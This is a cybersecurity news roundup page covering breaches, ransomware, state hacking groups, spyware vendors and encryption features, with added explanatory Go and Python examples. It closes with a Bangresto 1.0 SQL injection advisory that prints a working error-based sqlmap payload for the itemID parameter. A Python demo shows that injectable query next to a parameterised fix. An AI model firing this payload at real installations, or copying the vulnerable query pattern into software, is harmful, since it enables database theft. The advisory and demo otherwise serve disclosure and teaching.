Wednesday, January 15, 2025

IT infrastructure at Queensland University of Technology shut down following a ransomware attack


A cyber attack at Queensland’s second-largest university has caused campus printers to spit out ransomware notes in bulk.

The Queensland University of Technology has shut down multiple IT systems as a precaution.

QUT Vice-Chancellor Professor Margaret Sheil said her own printer was among those affected this morning.

Lillian Rangiah reports.

Read more at ABC (AU)

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Client-Side Encryption by Google Steps Up Gmail Security


As part of its effort to safeguard email sent through the web version of the platform, Google on Friday announced that client-side encryption for Gmail is in beta for Workspace and education customers.

The change is a welcome one for users who value the security of their personal data, and it comes at a time when concern about online privacy and data security is at an all-time high.

In order to participate in the beta programme, customers of Google Workspace Enterprise Plus, Education Plus, and Education Standard may apply until January 20, 2023. Personal Google Accounts cannot access it.

“Using client-side encryption in Gmail ensures sensitive data in the email body and attachments are indecipherable to Google servers,” the company said in a post. “Customers retain control over encryption keys and the identity service to access those keys.”

It is important to note that the new safeguard Gmail offers is different from end-to-end encryption.

Client-side encryption, as the name implies, encrypts data on the client before it is stored, and is a way to protect data at rest. It lets organizations encrypt data held on Google services with their own cryptographic keys; the data is decrypted on the client side using keys that are generated and managed by a key management service hosted in the cloud.

Google’s opt-in feature requires administrators to set up an encryption key service through one of the company’s partners (Flowcrypt, Fortanix, Futurex, Stormshield, Thales, or Virtru) or, alternatively, to build their own service using its client-side encryption API.

This means the data is protected from unauthorized access, even from the server or the service provider. However, the organization or administrator has control over the keys and can monitor users’ encrypted files or revoke a user’s access to the keys, even if they were generated by the user themselves.

On the other hand, end-to-end encryption (E2EE) is a method of communication in which information is encrypted on the sender’s device and can be decrypted only on the recipient’s device with a key known only to the sender and the recipient.

With that said, the new option – limited to the web browser for now – permits users to send and receive encrypted emails both within and outside of their domains. The encryption covers email body and attachments, including inline images, but not the subject and recipient lists.
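To make the distinction concrete, here is an added example (not Google's code and not its CSE API) that models the arrangement described above: a customer-run key service whose admin can revoke a user, a client that seals the message body before upload, and a mail server that stores sender, recipient and subject in the clear. The key service, the message layout and all names and values are assumptions made for illustration; an attachment would be sealed the same way under its own fresh nonce.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// KeyService models the customer-run key service Gmail CSE relies on: Google never holds these keys, and the org's admin can revoke users.
type KeyService struct {
	keys    map[string][]byte // key ID -> 256-bit AES key
	revoked map[string]bool   // user -> admin has revoked key access
}

func NewKeyService() *KeyService { return &KeyService{keys: map[string][]byte{}, revoked: map[string]bool{}} }

// Provision creates a random 256-bit key under keyID.
func (ks *KeyService) Provision(keyID string) error {
	k := make([]byte, 32)
	if _, err := rand.Read(k); err != nil {
		return err
	}
	ks.keys[keyID] = k
	return nil
}

// Fetch hands an AES-256-GCM instance to a user unless the admin revoked that user.
func (ks *KeyService) Fetch(user, keyID string) (cipher.AEAD, error) {
	if ks.revoked[user] {
		return nil, errors.New("key access revoked by administrator")
	}
	k, ok := ks.keys[keyID]
	if !ok {
		return nil, errors.New("unknown key ID")
	}
	block, err := aes.NewCipher(k)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

func (ks *KeyService) Revoke(user string) { ks.revoked[user] = true }

// Message is what the mail server stores and relays: sender, recipient and subject
// in the clear (as the article notes), body as nonce || AES-GCM ciphertext.
type Message struct {
	From, To, Subject, KeyID string
	Body                     []byte
}

// headerAAD binds the readable headers into the GCM tag, so the server cannot
// re-attach this ciphertext to different headers unnoticed.
func headerAAD(m *Message) []byte { return []byte(m.From + "\x00" + m.To + "\x00" + m.Subject) }

// Encrypt runs in the sender's browser: fetch the key, seal the body, upload ciphertext.
func Encrypt(ks *KeyService, user, keyID, from, to, subject string, body []byte) (*Message, error) {
	aead, err := ks.Fetch(user, keyID)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize()) // fresh per message; never reuse under one key
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	m := &Message{From: from, To: to, Subject: subject, KeyID: keyID}
	m.Body = aead.Seal(nonce, nonce, body, headerAAD(m))
	return m, nil
}

// Decrypt runs in the recipient's browser and fails once the admin revokes that user.
func Decrypt(ks *KeyService, user string, m *Message) ([]byte, error) {
	aead, err := ks.Fetch(user, m.KeyID)
	if err != nil {
		return nil, err
	}
	n := aead.NonceSize()
	if len(m.Body) < n {
		return nil, errors.New("ciphertext too short")
	}
	return aead.Open(nil, m.Body[:n], m.Body[n:], headerAAD(m))
}

// ServerCanRead is the provider's view: headers are searchable, the sealed body is not.
func ServerCanRead(m *Message, needle string) bool {
	n := []byte(needle)
	return bytes.Contains([]byte(m.Subject), n) || bytes.Contains([]byte(m.To), n) || bytes.Contains(m.Body, n)
}

func main() {
	ks := NewKeyService()
	_ = ks.Provision("acme-key-1") // constructed key ID for the demo
	m, _ := Encrypt(ks, "alice", "acme-key-1", "alice@acme.example", "bob@acme.example", "Q3 audit", []byte("three open findings"))
	fmt.Println("server reads subject:", ServerCanRead(m, "Q3 audit"), "body:", ServerCanRead(m, "open findings"))
}
```

Revoking a user at the key service is the lever the article says administrators keep: after `Revoke`, that user's `Decrypt` fails even though the ciphertext is unchanged.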

Gmail is not the only Google product with client-side encryption turned on. The tech giant enabled the same functionality for Google Drive last year and Google Meet earlier this August. A similar test for Google Calendar ended on November 11, 2022.

It’s worth noting that Google Drive apps for desktop as well as Android and iOS support client-side encryption. Google said that the feature will be integrated into mobile apps for Meet and Calendar in an upcoming release.

“Client-side encryption helps strengthen the confidentiality of your data while helping to address a broad range of data sovereignty and compliance needs,” the company further added.


LastPass finally admits attackers have a copy of customers’ password vaults


Customers of password manager LastPass have been informed that, during the attack on its servers in August 2022, unidentified persons copied encrypted vault files containing their stored passwords.

The August 2022 attack saw “some source code and technical information being stolen from our development environment and used to target another employee, obtaining credentials and keys which were used to access and decrypt some storage volumes within the cloud-based storage service,” according to a December 22 update to LastPass’s advisory on the incident.

Using those credentials, the attacker was able to copy data “that contained basic customer account information and related metadata, including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass service”.

According to the update, the hacker also copied information from the “customer vault” file in which LastPass users store their passwords.

This file “is saved in a proprietary binary format and contains both fully-encrypted sensitive fields, such as website usernames and passwords, secure notes, and form-filled data, as well as unencrypted data, such as website URLs.”

That means the attackers now hold users’ passwords. Thank goodness, though, that these passwords are encrypted with “256-bit AES encryption and can only be decrypted with a unique encryption key created from each user’s master password.”

Customers who use LastPass’ default settings are told that, even though attackers have that file, they are unaffected by this update because “it would take millions of years to guess your master password using generally available password-cracking technologies.”

One of those defaults is not reusing the master password that unlocks LastPass anywhere else. The company advises that you create a complex password and use it only to access LastPass.

However, users frequently display mind-bogglingly careless password selection, with two-thirds of users reusing passwords even though they should know better.

Oh, and don’t forget that the LastPass client vault has plenty of other secure spaces for storing private data.

Therefore, LastPass provided the following guidance to both individual users and business users:

If your master password does not make use of the defaults above, then it would significantly reduce the number of attempts needed to guess it correctly. In this case, as an extra security measure, you should consider minimizing risk by changing passwords of websites you have stored.

Dear reader, enjoy changing all those passwords.

The update from LastPass ends with the announcement that the compromised systems have been decommissioned and new infrastructure with increased security has been constructed.


Russian-Backed Hackers attacked a “major” oil refinery in a NATO Country


A major petroleum refining company headquartered in a NATO country was recently the target of an intrusion attempt by one of the Kremlin’s most active hacking groups focused on Ukraine. With Russia’s invasion of its neighbour still in full swing, the attack indicates that the group is expanding its intelligence collection.

The attempt took place on August 30 and was unsuccessful, according to researchers at Palo Alto Networks’ Unit 42. The Security Service of Ukraine has linked the group to Russia’s Federal Security Service. The group is tracked under a number of aliases, including Trident Ursa, Gamaredon, UAC-0010, Primitive Bear, and Shuckworm.

Unit 42 has mapped more than 500 new domains, 200 samples, and other breadcrumbs in the last 10 months. Trident Ursa has made its name with spear-phishing campaigns meant to infect targets with data-stealing malware. The majority of the group’s lures are written in Ukrainian, but more recent samples indicate that it has started using English-language lures as well.

Researchers from the company concluded that the samples “suggest that Trident Ursa is trying to increase their intelligence collection and network access against Ukrainian and NATO allies.”

Among the filenames used in the unsuccessful attack were: MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar, and List of necessary things for the provision of military humanitarian assistance to Ukraine.lnk.

Tuesday’s report did not name the targeted petroleum business or the country where the facility is located. Western-aligned officials have recently warned that the Kremlin has its sights set on energy companies in countries opposed to Russia’s war in Ukraine.

According to CyberScoop, National Security Agency Cyber Director Rob Joyce expressed alarm about large assaults from Russia, particularly those aimed at the international energy industry, last week.

“I would not encourage anyone to be complacent or be unconcerned about the threats to the energy sector globally,” Joyce said, according to CyberScoop. “As the [Ukraine] war progresses there’s certainly the opportunities for increasing pressure on Russia at the tactical level, which is going to cause them to reevaluate, try different strategies to extricate themselves.”

The NSA’s annual year in review noted that Russia has unleashed at least seven distinct pieces of wiper malware designed to permanently destroy data. One of those wipers took out thousands of satellite modems used by customers of communications company Viasat. Among the damaged modems were tens of thousands of terminals outside Ukraine that support wind turbines and provide Internet service to private citizens.

Ten days ago, Norway’s prime minister Jonas Gahr Støre warned that Russia posed a “real and serious threat… to the oil and gas industry” of Western Europe as the country attempts to break the will of Ukrainian allies.

Trident Ursa’s hacking techniques are simple but effective. The group uses multiple ways to conceal the IP addresses and other signatures of its infrastructure, phishing documents with low detection rates among anti-phishing services, and malicious HTML and Word documents.

Unit 42 researchers wrote:

Trident Ursa remains an agile and adaptive APT that does not use overly sophisticated or complex techniques in its operations. In most cases, they rely on publicly available tools and scripts—along with a significant amount of obfuscation—as well as routine phishing attempts to successfully execute their operations.

This group’s operations are regularly caught by researchers and government organizations, and yet they don’t seem to care. They simply add additional obfuscation, new domains and new techniques and try again—often even reusing previous samples.

Continuously operating in this way since at least 2014 with no sign of slowing down throughout this period of conflict, Trident Ursa continues to be successful. For all of these reasons, they remain a significant threat to Ukraine, one which Ukraine and its allies need to actively defend against.

Tuesday’s report provides a list of cryptographic hashes and other indicators organizations can use to determine if Trident Ursa has targeted them. It also provides suggestions for ways to protect organizations against the group.


Apple is accused of censoring apps in Hong Kong and Russia


According to two stories published on Thursday, Apple has been accused of sacrificing human rights for financial gain by obediently complying with censorship requests in China and Russia.

The Apple Censorship Project, which is sponsored by free speech advocacy group GreatFire, published the reports titled “Apps at Risk: Apple’s Censorship and Compromises in Hong Kong” and “United Apple: Apple’s Censorship and Compromises in Russia.”

According to Benjamin Ismail, campaign and advocacy director at GreatFire and project head of GreatFire’s Apple Censorship project, “as our two reports illustrate, evidence of Apple’s censorship abound.”

“Apple’s temporary withdrawal from Russia following the start of the war in Ukraine, and Apple’s decision to move part of its production out of China, have not provided tangible evidence of any improvement of the situation in the App Store so far. For all we know, Apple is still willing to collaborate with repressive regimes.”

Ismail said he expects the reports will be used to try to convince lawmakers to pass antitrust bills that aim to mitigate Apple’s App Store gatekeeping powers – something European lawmakers may have achieved with the recently approved Digital Markets Act.

The Hong Kong-focused Apps at Risk report contends that Apple’s 50 percent share of the smartphone market makes it the Chinese Communist Party’s de facto kill switch for politically challenging content.

It mentions that there were 2,370 unavailable apps in the Hong Kong App Store in November 2022. 10,837 apps are missing from the Chinese App Store, while 2,754 apps are absent from the Russian App Store.

According to the report, a lot of VPN apps have disappeared from the Hong Kong App Store. Many media and information apps have allegedly been banned globally over the past two years, raising the suspicion that Apple is either engaging in global self-censorship or is doing so on behalf of authorities.

The Apps at Risk report says Apple has failed to support the right of people in Hong Kong to access information without restriction and to express themselves online, even as the Chinese government has suppressed the democracy movement in Hong Kong.

“Apple’s known about Beijing’s authoritarian preferences for decades,” the report says. “Apple’s response to the events in Hong Kong the last few years are not knee-jerk reactions. Apple’s response is aligned to its global business strategies, with a top priority of appeasing the Chinese government to protect Apple’s supply chain, distribution channels, and revenue stream.”

The report demands that Apple officially reaffirm its support for the freedom of information and speech of Hong Kong residents.

The Russia report examines the differences in how Chinese and Russian censorship demands are carried out but reaches the same conclusions about Apple’s business practices. It claims that between 2018 and 2022, Apple appeared to accede to censorship requests from the Kremlin more quickly.

“If Apple’s compliance with requests for censorship is best illustrated by cases of app removals from the iOS App Store,” the report says. “Russia’s innovative and extensive oppression has also led to censorship within software (LGBTQ+ watch faces), accessories (LGBTQ+ watch bands), software-based cartography (Crimea), protocols (Private Relay), and even the design of iOS (Russian iOS).”

The Russia report, citing Apple’s removal of LGBTQ+ apps in furtherance of state-backed homophobia, calls out “the insincerity of Apple’s self-proclaimed support for LGBTQ+ Rights.”

Asked whether Apple’s deployment of end-to-end encryption in iCloud might change things, Ismail expressed skepticism.

“We know nothing about how the data are stored in China Guizhou data center, which is owned by a Chinese company and not by Apple,” he said in an email to The Register. “In this case, and for many other examples related to the management of the App Store (e.g. Government App Takedown Requests, App Store Review Board, etc.), Apple’s trademark is opacity.”

Ismail cautioned that the leverage authorities have in China and Russia over Apple will remain. “The relationships between those regimes and Apple are still asymmetrical, and strongly in favor of the governments of the country where Apple wants to maintain its access to the market, to build and to sell its products,” he said, pointing to Apple’s Private Relay, which never made it to China and was canceled in Russia.

Ismail however expressed optimism that Apple may be forced to allow third-party app stores. That requirement, called for under Europe’s Digital Markets Act, is also a part of the Open App Markets Act, a bill that GreatFire has endorsed and US lawmakers have yet to pass.

“If as a user, you are free to download and install apps from any store and the web, then the removal of apps by Apple at the behest of a repressive government will have less impact on the users,” Ismail explained. “Developers will still be able to update (and therefore secure) their apps and offer them to the users without control or intervention from Apple.”

“Moreover, it should be easier for Apple to dismiss censorship demands by saying that the users can still find the app targeted by the authorities, outside of the App Store. Eventually, it might dissuade the authorities to even make the demand to Apple.”

“Of course sideloading is not the perfect solution and other stores might be targeted by repressive governments. The important part is to let the users handle their device the way they want it to work. To have developers, publishers and customers all subject to Apple’s decision is very dangerous. It has been the case repeatedly over the last decade.”

Asked if Apple’s rivals have handled the situation any better, Ismail pointed to Google, which shut down its Chinese search engine in 2010 after it was hacked from within the country.

Google and Twitter, he said, do much better in terms of transparency, citing an Apple Censorship report from April “showing Apple is lying in its Transparency reports and deliberately conceals the scale of app’s unavailability and the reality of the 175 App Stores it operates worldwide.”

“It might be time for Apple to consider the possibility that it does more harm by being present in China than by not being there,” said Ismail. “In its Human Rights Policy, Apple claims ‘Our approach is based on the UN Guiding Principles on Business and Human Rights,’ yet every principle set in that UN document is the exact opposite of Apple’s policy.”

Apple did not respond to a request for comment.


100,000 students’ grades and personal information were leaked via McGraw Hill’s S3 buckets


According to security researchers, McGraw Hill’s misconfigured Amazon Web Services S3 buckets exposed more than 100,000 students’ records in addition to its own source code and cryptographic keys.

The research group at vpnMentor claimed to have found the open S3 buckets on June 12 and to have gotten in touch with McGraw Hill the following day. We’re informed that two buckets, one for production and the other for non-production, each held more than 69 million files and 10 TB of data.

“In the limited sample we researched, we could see that the amount of records varied on each file from ten to tens of thousands students per file,” the researchers said. “Due to the amount of files exposed and because we only review a small sample following ethical rules, the actual total number of affected students could be far higher than our estimate.”

Overall, the buckets contained more than 22 TB of data and over 117 million files. It included students’ names, email addresses, performance reports and grades as well as teachers’ syllabi and course reading materials for US and Canadian students and schools such as Johns Hopkins University, University of California-Los Angeles, University of Toronto and University of Michigan. 

Additionally, the data dump leaked private digital keys, which could have allowed miscreants to decrypt the publisher’s sensitive data and access its servers, plus McGraw Hill’s source code. 

The misconfigured S3 buckets could have been accessed by anyone with a web browser as far back as 2015, we’re told. 

The researchers added that they used publicly accessible data to validate a “small sample” of the records, comparing students’ social media profiles to the PII in McGraw Hill’s open buckets to show that the data belonged to real people rather than to a platform test.

vpnMentor says it contacted McGraw Hill nine times between June 13 and July 4, including outreach to various departments and the chief information security officer, but never received a response after confirming that the data belonged to the company’s online learning platform.

Furthermore, the network security company claimed that between June 27 and July 4 it contacted the United States Computer Emergency Response Team (US-CERT) four times but received no response from them either.

Finally, according to the report, on September 21, McGraw Hill’s senior director of cybersecurity informed vpnMentor that the sensitive files had been taken down from the public pool on July 20.

“We are unable to determine if any malicious hackers found the unsecured buckets before McGraw Hill deleted the sensitive files,” the researchers wrote, adding that the exposed data could have been used for phishing campaigns and identity theft as well as doxxing and harassment.

Plus, we’d guess that the publishing firm’s source code and private keys would be appealing to ransomware gangs, who have a certain affinity for education-sector organizations and schools, or even less sophisticated criminals looking to make a buck or two on the darkweb.

“Furthermore, under US Federal law, student education records are official and confidential documents, by virtue of the Family Educational Rights and Privacy Act (FERPA),” the researchers noted. “A student’s grades may not be released or posted in any personally identifiable way without prior written permission from the student. As a result, by exposing these records, McGraw Hill may be in direct violation of FERPA, and could face enforcement actions from the relevant US government bodies.”

Not to name names, but a certain US watchdog agency (cough) Federal Trade Commission (cough) doesn’t take too kindly to leaks involving students’ data.

McGraw Hill did not respond to inquiries for this story.


Swatters live-streamed attacks and mocked police using Ring cameras


Two men are accused by federal prosecutors of participating in a campaign of swatting attacks against more than a dozen owners of compromised Ring home security cameras and using that access to broadcast the police reaction live on social media.

According to prosecutors in an indictment filed on Friday in the Central District of California, Kya Christian Nelson, 21, of Racine, Wisconsin, and James Thomas Andrew McCarty, 20, of Charlotte, North Carolina, compromised the Yahoo Mail accounts of each owner before gaining access to 12 Ring cameras. In a single week starting on November 7, 2020, prosecutors said, the men placed hoax emergency calls to the local police departments of each owner that were intended to draw an armed response, a crime known as swatting.

On November 8, for instance, local police in West Covina, California, received an emergency call purporting to come from a minor child reporting that her parents had been drinking and shooting guns inside the minor’s home. When police arrived at the residence, Nelson allegedly accessed the residence’s Ring doorbell and used it to verbally threaten and taunt the responding officers. The indictment alleges the men helped carry out 11 similar swatting incidents during the same week, occurring in Flat Rock, Michigan; Redding, California; Billings, Montana; Decatur, Georgia; Chesapeake, Virginia; Rosenberg, Texas; Oxnard, California; Darien, Illinois; Huntsville, Alabama; North Port, Florida; and Katy, Texas.

Prosecutors alleged that the two men and a third unnamed accomplice would first obtain the login credentials of Yahoo accounts and then determine if each account owner had a Ring account that could control a doorbell camera. The men would then use their access to gather the names and other information of the account holders. The defendants then placed the hoax emergency calls and waited for armed officers to respond.

“Defendants Nelson and McCarty would access without authorization the victims’ Ring devices and thereafter transmit the audio and video from those devices on social media during the police response,” prosecutors wrote. “Defendants Nelson and McCarty would verbally taunt responding police officers and victims through the Ring devices during the police response.”

It’s not clear how the defendants allegedly obtained the Yahoo account credentials.

A separate indictment filed in November in the District of Arizona alleged that McCarty participated in swatting attacks on at least 18 individuals.

Nelson, who used the moniker ChumLul, was already incarcerated in an unrelated case in Kentucky when the indictment was returned. McCarty, whose online handle was Aspertaine and who lived in Kayenta, Arizona, at the time of the alleged offenses, was arrested last week.

Both men are charged with one count of conspiracy to intentionally access computers without authorization. Nelson was also charged with two counts of intentionally accessing without authorization a computer and two counts of aggravated identity theft. If convicted, both men face a maximum penalty of five years in prison. Nelson faces an additional maximum penalty of at least seven years on the remaining charges.

Neither man has entered a plea yet.

The incident underscores the importance of securing email and home security accounts with long, randomly generated unique passwords. Whenever possible, people should use multi-factor authentication as well.


Email hijackers con businesses out of food as well as money


The FBI and other government agencies have warned that cybercriminals have begun using spoofed emails to steal shipments of real commodities, in this case, food. Business email compromise (BEC), which continues to be a multibillion-dollar danger, is evolving.

The FBI, along with the US Department of Agriculture and the Food and Drug Administration’s Office of Criminal Investigations, claimed that a number of US food manufacturers have already been the victims of frauds, many of which involved fake orders for a single product—powdered milk—worth hundreds of thousands of dollars.

BEC attacks are among the most financially damaging internet crimes, according to the FBI, which says they brought in about $2.4 billion in 2021 alone. The scheme involves a criminal gaining access to a legitimate account, or spoofing one, and using it as the rightful owner would.

“In recent incidents, criminal actors have targeted physical goods rather than wire transfers using BEC tactics. Companies in all sectors—both buyers and suppliers—should consider taking steps to protect their brand and reputation,” the federal agencies said in their joint advisory.

The demand seems to have its roots in the 2008 Chinese infant formula scandal, when milk powder tainted with melamine killed six children and hospitalised thousands more. Because Chinese parents are apparently still wary of domestically produced milk powder, imported brands command a premium in China.

Powdered-milk smugglers have been caught before, such as the Australian ring busted in 2019 for stealing powdered milk and reselling it abroad. If nothing else, the progression from shoplifting to shipment-lifting shows black-market capitalism at work.

The FBI, FDA, and USDA noted in the joint alert that one victim was left liable for $160,000 worth of stolen milk powder after responding to one bogus request, while another had many orders totaling nearly $1 million.

The Learning Channel hacked, nearly 1TB of data stolen

Cyber extortion group Karakurt has added The Learning Channel (TLC) to its list of alleged victims, and says it’s ready to leak 931 GB of the company’s “scripts, videos, internal documentation,” and employee information if the company doesn’t pay up by December 23rd.

Karakurt, which is believed to be affiliated with the Conti ransomware group, has been on the radar of the FBI, CISA and the US Treasury Department since at least June, when the agencies issued a joint advisory warning of the threat posed by the group.

The Karakurt gang is believed to gain access by, among other means, buying compromised account credentials. The group has reportedly resorted to harassing and bullying victims’ employees and business partners in an effort to pressure them into paying.

According to the agencies, Karakurt is indiscriminate in its targeting and has demanded payments of between $25,000 and $13 million not to leak stolen data. Karakurt isn’t known to deploy ransomware; it is a pure data-theft extortion operation.

TLC is a subsidiary of Discovery, which also operates HGTV, Cinemax and other television networks. Karakurt’s claim to have infiltrated the network is unverified and its ransom demand is unknown. Discovery does not appear to have acknowledged the breach as of writing, and we’ve reached out to learn more.

Cloudflare offers free zero-trust to small critical infrastructure firms

Content delivery network Cloudflare is launching an initiative that will give small businesses operating in critical infrastructure sectors its zero trust platform free of charge, if they qualify.

Dubbed “Project Safekeeping,” the initiative is necessary, Cloudflare said, because the volume of attacks faced by companies in critical infrastructure sectors such as healthcare and energy is overwhelming even for the largest firms.

“Smaller organizations typically do not have the capacity to manage relentless cyber attacks,” Cloudflare said.

The products Cloudflare is offering will be free with no time limit, the company said, and include real-time user verification for applications, traffic filtering, cloud application security, data loss prevention, email security and remote browser isolation. DDoS protection and Cloudflare’s web application firewall are also included.

Unfortunately, the qualifying criteria are fairly restrictive.

Only companies located in Australia, Japan, Germany, Portugal and the United Kingdom can apply, and applicants must operate in a sector their government has designated as “critical infrastructure.”

Those meeting that pair of criteria face a final filter: a headcount of no more than 50 people and/or an annual revenue or balance sheet total of less than US$10 million. There’s no word on whether growth would result in loss of access, but it’s safe to assume Cloudflare would want successful customers to start paying at some point.

Meta issues a warning about the continued use of spyware targeting users of social media

Facebook’s owner says surveillance-for-hire firms are adjusting their tactics in response to attempts to shut them down.

Meta has warned that the use of spyware to indiscriminately target people, including journalists and activists, remains a continuing threat, because surveillance-for-hire businesses keep adapting and shifting their strategies in the face of attempts to shut down their capabilities.

According to a report by Facebook’s parent company, the social media group took action against a number of companies, including two with ties to Russia, one with roots in Israel and one in China. According to Meta, these companies were all used to “scrape” Facebook and Instagram for users’ private information in an effort to compromise their accounts.

In one instance, Meta said it deleted more than 100 Facebook and Instagram profiles connected to a Russian company named Avalanche, which it said sold access to a platform enabling online espionage. According to Meta, the Russian network targeted a wide range of people and organisations, including politicians, journalists, NGOs operating in the US and environmental activists. Other businesses removed from Meta platforms included the Israel-based Cyberglobes and the New York-based Social Links, which has its roots in Russia.

At the same time, Meta acknowledged that other companies it sought to ban from its platforms last year, after accusations that their software had been used to target thousands of users with malicious activity, have tried to circumvent those blocks and have updated their software to evade detection.

Nathaniel Gleicher, Meta’s head of security policy, said the company had sought to share threat information with governments and other technology companies to mitigate the threat to users. But Gleicher also acknowledged that one big player in the social media industry, Twitter, no longer appeared to be available to receive information about such threats.

“Our key goal is to do everything we can to protect people. So we share our insights with our industry peers. Twitter is going through a transition right now and most of the people we’ve dealt with have moved on. As a result, we have to wait and see what they announce in these threat areas,” Gleicher told reporters on a call about the Meta report.

Forbes reported in November that Twitter’s security, privacy and compliance leaders all left the company less than two weeks after its acquisition by the billionaire Elon Musk.

Gleicher emphasised that no single company could tackle a “society-wide” challenge such as spyware. “They [spyware companies] are very ready to keep trying to come back, to re-establish their businesses,” Gleicher said.

Twitter was not available for comment.

Meta said some vendors of spyware used to target its users sometimes claim their software is intended to focus on criminals and terrorists, but Meta said its own threat research found that the software was used “regularly” to target “journalists, political opposition and human rights activists around the world”.

“These companies are part of a sprawling industry that provides intrusive software tools and surveillance services indiscriminately to any customer – regardless of who they target or the human rights abuses they might enable,” Meta said in its report. “In a sense, this industry ‘democratises’ these threats, making them available to government and non-government groups that otherwise wouldn’t have these capabilities to cause harm.”

In one case, Meta said it shut down a network of 900 fake Instagram and Facebook accounts operating from China, which appeared to focus on people in Myanmar, India, Taiwan, the US and China, including military personnel, pro-democracy activists, government employees, politicians and journalists.

Avalanche could not be reached for comment. Social Links and Cyberglobes did not immediately return requests for comment.

Bangresto 1.0 SQL Injection

An SQL injection vulnerability was discovered in Bangresto 1.0 by security researcher @nu11secur1ty.

## Title: Bangresto 1.0 SQLi
## Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto

## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
An attacker can steal all information from the database of this
application.

## STATUS: CRITICAL Vulnerability

[+] Payload:

```MySQL
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)

## Proof and Exploit:
[href](https://streamable.com/moapnd)

## Time spent
`00:30:00`
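The advisory above reports the classic error-based signal (a single quote in `itemID` comes back as a database error) and gives the sqlmap payload, but shows neither the vulnerable code nor its fix. The following is an added example written for this page, not code from Bangresto or from the researcher's repository. It contrasts a concatenated query with a parameterised one, runs the advisory's two probes against both, and decodes the hex marker strings in the sqlmap payload to show how error-based extraction reads a value back out of the error message. SQLite stands in for MySQL so the example runs offline, which means the error the payload triggers here is "no such function: UPDATEXML" rather than MySQL's XPath error; the table name, columns and the sample error string are assumptions and are not taken from the application.

```python
import re
import sqlite3

# sqlmap's error-based payload from the advisory, as submitted in the itemID parameter.
SQLMAP_PAYLOAD = (
    "(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,"
    "(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))"
)

# Constructed error text in the general shape of MySQL's XPath error; exact wording
# varies by server version. ELT(2539=2539,1) evaluates to 1, so 1 is the "extracted" value.
SAMPLE_MYSQL_ERROR = "XPATH syntax error: '.qqvxq1qppjq'"


def make_db():
    """Constructed stand-in for the app's database. Bangresto is a PHP/MySQL POS;
    the table and column names here are assumptions, not taken from it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menu_items (itemID INTEGER, menuID INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO menu_items VALUES (?, ?, ?)",
        [(1, 1, "Coffee"), (2, 1, "Tea"), (3, 2, "Soup")],
    )
    return conn


def lookup_vulnerable(conn, item_id, menu_id):
    """Builds the statement by string formatting: request parameters become SQL text."""
    sql = f"SELECT name FROM menu_items WHERE itemID={item_id} AND menuID={menu_id}"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, item_id, menu_id):
    """Parameterised query: the driver binds the values, so a quote or a function
    call in the input is compared as data and can never change the statement."""
    sql = "SELECT name FROM menu_items WHERE itemID=? AND menuID=?"
    return [row[0] for row in conn.execute(sql, (item_id, menu_id))]


def probe(lookup, conn, item_id, menu_id="1"):
    """Classifies a response the way an error-based probe does: a database error
    reaching the client is the injection signal the advisory describes."""
    try:
        return ("ok", lookup(conn, item_id, menu_id))
    except sqlite3.Error as exc:
        return ("db_error", str(exc))


def decode_hex_literals(payload):
    """Decodes the 0x... literals in the payload. sqlmap sends its marker strings
    this way so they survive quote filtering; returned in order of appearance."""
    return [bytes.fromhex(h).decode("ascii") for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def extract_between_markers(error_text, start, end):
    """Pulls the value the server echoed between sqlmap's markers out of an error
    message. One error yields one value; sqlmap repeats this per row and column."""
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(end), error_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    conn = make_db()
    quote = "'"
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterised", lookup_safe)):
        print(name, "normal :", probe(fn, conn, "1"))
        print(name, "quote  :", probe(fn, conn, quote))
        print(name, "sqlmap :", probe(fn, conn, SQLMAP_PAYLOAD))
    start, end = decode_hex_literals(SQLMAP_PAYLOAD)[1:]
    print("markers  :", start, end)
    print("extracted:", extract_between_markers(SAMPLE_MYSQL_ERROR, start, end))
```

Run it directly to see the six probe results side by side: both probes produce a database error against the concatenated query and an empty, error-free result against the bound one. The fix is the bound parameters; casting `itemID` to `int` before the query is a worthwhile second layer for an integer key, and the application should also stop echoing driver errors to the client, since that leak is exactly what the advisory's probe relies on.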
